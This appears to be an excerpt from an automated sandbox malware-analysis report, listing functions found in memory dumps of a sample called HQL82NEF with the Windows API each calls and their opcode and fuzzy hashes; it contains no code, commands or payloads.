LdrInitializeThunk.NTDLL ref: 06EAB45F

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de14cc33e0fd0683bf0ef1740be213348486ba059d927bbc78b2e6a412fe986c
Instruction ID: 84edea7054a5da5499e4c81b1abad3449af3594bceb5ca79463b96b6d8c1d019
Opcode Fuzzy Hash: de14cc33e0fd0683bf0ef1740be213348486ba059d927bbc78b2e6a412fe986c
Instruction Fuzzy Hash: E7614F31A11309DFDB58EF78D558BAEBBB3AF84305F108429E402AB394DF75A841CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013DE798 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013DE90A

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 557674386975513eba94841cfc757c6ee6dbc8e836d985c0ee6fb7dd9c5442c1
Instruction ID: 64325c843c35950583431c16a4110bcc7c82ad66a6b02f92d6d46401407f695f
Opcode Fuzzy Hash: 557674386975513eba94841cfc757c6ee6dbc8e836d985c0ee6fb7dd9c5442c1
Instruction Fuzzy Hash: A9510FB2C00249EFDF15CFA9D984ADDBFB6BF48314F24816AE818AB220D3359955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 013DAC64 Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 013DADAB

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c21208879cedda946aeaade42f4009f526b3b1a3ffb38e35d1dd108b0efbce4d
Instruction ID: 3bcd37d2c6533c5e1915cc09742a59082056746718e7b30d7ab432a8e4d9e806
Opcode Fuzzy Hash: c21208879cedda946aeaade42f4009f526b3b1a3ffb38e35d1dd108b0efbce4d
Instruction Fuzzy Hash: 875153B1E102188FDB18CFA9D994B9DBBF4BF48308F14801AE819BB390D774A845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 06EACF07 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,?), ref: 06EAD004

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 29bbef35f02a952ac0f931b3715209668c95ad6c5f860dfe98644f89f993710e
Instruction ID: 459fc748394b5f3a0c586cc1b09e36a32fd0b707e33631659965262f80799707
Opcode Fuzzy Hash: 29bbef35f02a952ac0f931b3715209668c95ad6c5f860dfe98644f89f993710e
Instruction Fuzzy Hash: DE51BFB0D003489FDB54CF99CA84BCDBBF5BF48314F60852AE408AB265DB75A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06EACF08 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,?), ref: 06EAD004

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 10eaa1a508f51575a5ce81dadeac0fa5b6e2d56573b1d0d61ee8b62caff3554d
Instruction ID: 187cf016cd7d356b22c2a16f88c17e52595d8b99e0902ad917fc4d03e13df468
Opcode Fuzzy Hash: 10eaa1a508f51575a5ce81dadeac0fa5b6e2d56573b1d0d61ee8b62caff3554d
Instruction Fuzzy Hash: 6D51BFB0D003489FDB54CF99CA84BCDBBF5BF48314F60852AE408AB265D775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 067876A8 Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(?,00000000,?,?), ref: 067877E0

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: b249b22fb6aa7ea7a97121fed5831e9b75f5b6ae869c9e3d7c6f2b2b873ff356
Instruction ID: e59c336041c919bd849520f42c219ebfe3014d0add564a307d6ffe3be5c80b21
Opcode Fuzzy Hash: b249b22fb6aa7ea7a97121fed5831e9b75f5b6ae869c9e3d7c6f2b2b873ff356
Instruction Fuzzy Hash: A5419C75E012199FCB54DFA9D8846DEFBF4FF88710F20846AE918AB204D7319904CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 013DD59C Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013DE90A

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 739abc5117652c2a3058ecd53eed60276187b7fcbaf45cd79878e40fa8a6afd9
Instruction ID: 62860f60b6ee527d1e79888030f58a45905e1363fb2f09421de07f74fdcf6d3c
Opcode Fuzzy Hash: 739abc5117652c2a3058ecd53eed60276187b7fcbaf45cd79878e40fa8a6afd9
Instruction Fuzzy Hash: 2851B0B1D103099FDB14CF9AD884ADEBFB5BF88314F24812AE818AB210D774A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 074A2F00 Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 074A2FEF

Memory Dump Source

Source File: 00000003.00000002.1133444946.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91333fbf747389258fd38e5bf2506e6341829fe5c450dfe72bf0506a03a4383e
Instruction ID: 1d73943f22567122da423a38ad18fc506da7504cb1820bb3f0e80876b9d1e042
Opcode Fuzzy Hash: 91333fbf747389258fd38e5bf2506e6341829fe5c450dfe72bf0506a03a4383e
Instruction Fuzzy Hash: FD413DB4A05205EFC768AF34D96066FB6A2FB95704B208D3FD51687358EB32D941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 074A2EF1 Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 074A2FEF

Memory Dump Source

Source File: 00000003.00000002.1133444946.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e6d590af68682a13dbfa443621823afc6786f3d605bd68b5cc65cb81297ddd9f
Instruction ID: e572de274fea9048d4eeb92377e1fe374d3a4ed709577474fbb3088dd379b39a
Opcode Fuzzy Hash: e6d590af68682a13dbfa443621823afc6786f3d605bd68b5cc65cb81297ddd9f
Instruction Fuzzy Hash: C5415FB4A05205EFC724AF3498606AFB7B1FBA5704B208D3FD50687358EB32D941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 070B6AA4 Relevance: 1.6, APIs: 1, Instructions: 106libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 070B6AC7

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5c06ae2d90d75baa0a4a687a612b492b21dd70b7e6c94fe9ad3ed75f0058751d
Instruction ID: f0b9e45e8d1975928e05aa19b93799c96eff5c7f998c4bbdb40a04841dda891f
Opcode Fuzzy Hash: 5c06ae2d90d75baa0a4a687a612b492b21dd70b7e6c94fe9ad3ed75f0058751d
Instruction Fuzzy Hash: F4416F34B002168FDB68AB34C8647AD76F2BF84705F5485A9D509D7388DF358E81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 070B6A9B Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 070B6AC7

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f8e4d8fa4626082cea46eb32cddf51b90285caba2cd6c1462860d2355d80032
Instruction ID: 9999f72677a9ffb98d042099375b4cfd3475d36ff78db43e8e45fa48b0b09f3e
Opcode Fuzzy Hash: 0f8e4d8fa4626082cea46eb32cddf51b90285caba2cd6c1462860d2355d80032
Instruction Fuzzy Hash: 7D317E74B002168FDB68AB24C8647AE76F2FF84705F5485A9D40AD7388DF358A81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06782014 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06783411

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b1204a490106f7b3662ea65bd035518e9a0ef1390aae894cdadfe751b34fbafe
Instruction ID: 308134fed6dca600bf3048a76374e7452c70c96720755e535a7775338cf06815
Opcode Fuzzy Hash: b1204a490106f7b3662ea65bd035518e9a0ef1390aae894cdadfe751b34fbafe
Instruction Fuzzy Hash: 52413BB5900305CFDB54DF99C448AAABBF5FB88724F248859E419AB321D775AC41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06EADCC0 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 06EAE669

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e062c952cae44ca7e3c378b82d37680339eae1c98e39718b634920c588c95646
Instruction ID: c25ea721d0293818c77b65ac6d182500e1fc6726b56a7b78b731f5ea98069e7b
Opcode Fuzzy Hash: e062c952cae44ca7e3c378b82d37680339eae1c98e39718b634920c588c95646
Instruction Fuzzy Hash: 3C3102B1D103589FCB64CF9AC980A8EBFF5AF88314F14842AE818AB310D730A905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06EAE5AB Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 06EAE669

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b2aae89c34e658edddc4995a07cd4cfb81e548d36b9ff7ee6a29ef60d42ede88
Instruction ID: 28363991b67a39adb521d8a7bd207156a652cc94d942195d41cdfa3f5567c1cd
Opcode Fuzzy Hash: b2aae89c34e658edddc4995a07cd4cfb81e548d36b9ff7ee6a29ef60d42ede88
Instruction Fuzzy Hash: 1D31F3B1D103589FCB14CF9AC980ACEBFF5AF88314F14842AE918AB310D734A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06EAE373 Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 06EAE42C

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 70b0e7d51eca9a086c301e9039a3508355e47ece61e38916a43db1ef06c2ffaa
Instruction ID: 1a21ac005c043d4d68e061b36749f4665d9a8ba41c935a85789f130609b4cd3d
Opcode Fuzzy Hash: 70b0e7d51eca9a086c301e9039a3508355e47ece61e38916a43db1ef06c2ffaa
Instruction Fuzzy Hash: A9310EB1D013499FDB14CF99C584A8EFFF9AF48314F28856AE408AB214C775A985CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06EADCB4 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 06EAE42C

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b0de56d90fcce63667a4338b65cc6f3fc2042312d007ef0c6fbce912cb37d5a3
Instruction ID: 45a0a75da51a8cd7a5b8543b283ac9a742659b23414a011c57dae415065b312d
Opcode Fuzzy Hash: b0de56d90fcce63667a4338b65cc6f3fc2042312d007ef0c6fbce912cb37d5a3
Instruction Fuzzy Hash: F63112B0D013499FDB10CF99C584A8EFFF9AF48314F24856AE408AB354C7B5A985CF94

Uniqueness

Uniqueness Score: -1.00%

Function 074AC050 Relevance: 1.6, APIs: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 074AC0F5

Memory Dump Source

Source File: 00000003.00000002.1133444946.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_HQL82NEF.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 340ffc9083f439e5b6c37525a0b3d791f03d5c55ad1160f3740c8e8159cc901a
Instruction ID: bb4a9a40454aed06703db268ebeef302ef03b107bdc9a1917f53d9f6499bf16d
Opcode Fuzzy Hash: 340ffc9083f439e5b6c37525a0b3d791f03d5c55ad1160f3740c8e8159cc901a
Instruction Fuzzy Hash: 61219DB5804389EFCB12CFA9D594ADABFF4AF4A310F25845AD454A7211C334A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06EAF8E7 Relevance: 1.6, APIs: 1, Instructions: 72comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06EAF970

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: a8e13d335c6ad92d5b86641e938facff950adab4c53d6b7e59f95644be5fb830
Instruction ID: 0a9098766ddc6e6a9b8c4c5fe57d4bf16a1ca66bf8eec9b3ddd7dac6afa80a1a
Opcode Fuzzy Hash: a8e13d335c6ad92d5b86641e938facff950adab4c53d6b7e59f95644be5fb830
Instruction Fuzzy Hash: CA31F2B0D01348EFDB54CF99CA84BCEBBF5AF48314F24801AE404AB290D774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EAF8E8 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06EAF970

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: d5c0f1d245339673a628df23e7792eeded4422cc53f4a90578628167bbe85ef5
Instruction ID: c915764539efded9a321f2767e41349271081de2e3a2d7a2f02b9d62da10bec0
Opcode Fuzzy Hash: d5c0f1d245339673a628df23e7792eeded4422cc53f4a90578628167bbe85ef5
Instruction Fuzzy Hash: BF31D1B0D11348EFDB54CF99CA84BCEBBF5AF48314F24901AE404AB294D774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06782518 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,067824E6,?,?,?,?,?), ref: 067825A7

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fc731c0f58fce835ef73f98c46a07e032857f96ca98adf307aae359b21cfaeb5
Instruction ID: 498933355d0222bed807c5b51d7adce9d431f1bfb1faa19164818c74d61c7bbe
Opcode Fuzzy Hash: fc731c0f58fce835ef73f98c46a07e032857f96ca98adf307aae359b21cfaeb5
Instruction Fuzzy Hash: CB2119B59013499FDB10CFAAD984ADEBFF8EB48310F14845AE854A7310D374A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06781EB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,067824E6,?,?,?,?,?), ref: 067825A7

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 66d58e82a147564df61c800dbc60e8d85d00ac41f15e36c93c295316a4615239
Instruction ID: 75f92e5fd37b1e49e3b4af53953ec75b80bf29391379424dcdeaa9426c675998
Opcode Fuzzy Hash: 66d58e82a147564df61c800dbc60e8d85d00ac41f15e36c93c295316a4615239
Instruction Fuzzy Hash: 472105B59013089FDB50CF9AD984ADEBFF8EB48320F14845AE914A7310D374AA50CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013DD320 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013DD3B6

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8ee1399dd132aabc5cf51657fd7b8b092ff28017dbf03dd51127fc76f50c1919
Instruction ID: 8560d6b7e9becf16802906fef9d293602aac039b1c0243b45704988ba3c64225
Opcode Fuzzy Hash: 8ee1399dd132aabc5cf51657fd7b8b092ff28017dbf03dd51127fc76f50c1919
Instruction Fuzzy Hash: 91218CB68093899FDB11CFAAD84478EBFF4AF4A314F18849AC454A7252C338A505CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EAEF62 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,06EAEF57), ref: 06EAEFE7

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 174e6d8a21e87ea05cdcb87ea8c3ab334dac75b69d0e77a23773b51052b61014
Instruction ID: 82878645d07aacc947e3c2fe3f633a50430b60dce80d26573f01f0666919c07e
Opcode Fuzzy Hash: 174e6d8a21e87ea05cdcb87ea8c3ab334dac75b69d0e77a23773b51052b61014
Instruction Fuzzy Hash: A22188B18043888FCB10CFAAD845ADEFFF8EF49324F24449AD444AB241C674A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 067871D2 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06787248

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: e0b41e3e88aecca4d760a93be1aa9eb463830c0a4c38202082e57041f9ea1399
Instruction ID: b886b4e4ed9b404cd6eaae971860d81160a99b9268627cdf7438ea4b336409a8
Opcode Fuzzy Hash: e0b41e3e88aecca4d760a93be1aa9eb463830c0a4c38202082e57041f9ea1399
Instruction Fuzzy Hash: 312158B1C0065A9FCB14CF9AD5457EEFBF4EF48320F25816AE818A7240D738A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013D3F47 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 013D3FD2

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: db862a3807f18748d77ab75b86e0ac1e6660db50dced3ae2f159ed7fe4a6ab9c
Instruction ID: 5148d3e89a86b0466ef0c38461fad14f7acb0565755c77bfc0ff0c977ffaf9df
Opcode Fuzzy Hash: db862a3807f18748d77ab75b86e0ac1e6660db50dced3ae2f159ed7fe4a6ab9c
Instruction Fuzzy Hash: 2421CFB2C013098FDB20CF69E509799BFF8FB44324F108459D044E3201D7386544CF61

Uniqueness

Uniqueness Score: -1.00%

Function 06EADD14 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,06EAEF57), ref: 06EAEFE7

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 779f32351a937552ab40ebe759e98668ba97a83c4a808897ce52e7282216ed29
Instruction ID: 742ed759000eb1d2e133b8da5b590be38a08aee860b985427456c6037efbb9ea
Opcode Fuzzy Hash: 779f32351a937552ab40ebe759e98668ba97a83c4a808897ce52e7282216ed29
Instruction Fuzzy Hash: 3E1156B18043498FCB10DF9AD9447DEBFF8EF89324F20845AD564AB260D774A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 067871D8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06787248

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 284e22bc9ad4ca14979690d1397eb7c9a288211ec67fbe06823b0bd380ccbe73
Instruction ID: b113b1894d840fe3427ce1329c2cd02b9fb87a63f5fbf0bbbb09f5af0d402a7b
Opcode Fuzzy Hash: 284e22bc9ad4ca14979690d1397eb7c9a288211ec67fbe06823b0bd380ccbe73
Instruction Fuzzy Hash: E41147B1C0061A9FCB14DF9AD5447EEFBF4EF48320F24816AE818A7240D338A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EAB417 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06EAB45F

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f394b2d99d8199d64d7c2f889064a01fc3e511136e29dc1249ae00ef21738d5d
Instruction ID: 44bd268a04e22b3d57f533afb1a5b9542c8dc71d7f2c4ac53afb94b06ae4a343
Opcode Fuzzy Hash: f394b2d99d8199d64d7c2f889064a01fc3e511136e29dc1249ae00ef21738d5d
Instruction Fuzzy Hash: 9C114C30D11308EFCB58EF68D594AAEBBB2FF88304F108528E4016B395CB31A885CF95

Uniqueness

Uniqueness Score: -1.00%

Function 013D3F58 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 013D3FD2

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2748d33e66152a8c0ec0100c0ace6736a39924eec2f57844da6b5903f2a2eb94
Instruction ID: 9b9f055a99e44113a6d6b41a124316c9376fe2c3eb9b92a91a2b2bcb5fff88af
Opcode Fuzzy Hash: 2748d33e66152a8c0ec0100c0ace6736a39924eec2f57844da6b5903f2a2eb94
Instruction Fuzzy Hash: BA117FB19113098FDB60CFA9D50879EBFF8FB48324F208469D444E7641D739A944CF66

Uniqueness

Uniqueness Score: -1.00%

Function 074AC130 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 074AC195

Memory Dump Source

Source File: 00000003.00000002.1133444946.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_HQL82NEF.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 542468434238a2f2de5cbcc1a1b56ad538b79153ec999173fda90f17fbc631ea
Instruction ID: 4d206dc89e4c67c469af5e479ea437aeb72987532d4b0a8da4abe4481582bc63
Opcode Fuzzy Hash: 542468434238a2f2de5cbcc1a1b56ad538b79153ec999173fda90f17fbc631ea
Instruction Fuzzy Hash: 5E1128B58003499FDB10CF9AC884BEEFFF8EB49320F24845AE454A3200D378A545DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013DC564 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013DD3B6

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c44ead0cee4dafe2ea0b280b1d268e557aed59489589f34e3d25fd33cb41b393
Instruction ID: 93fca157ab3ad72a1290f5feed871a14740bbd5a3024d0659e5267d8b24ca101
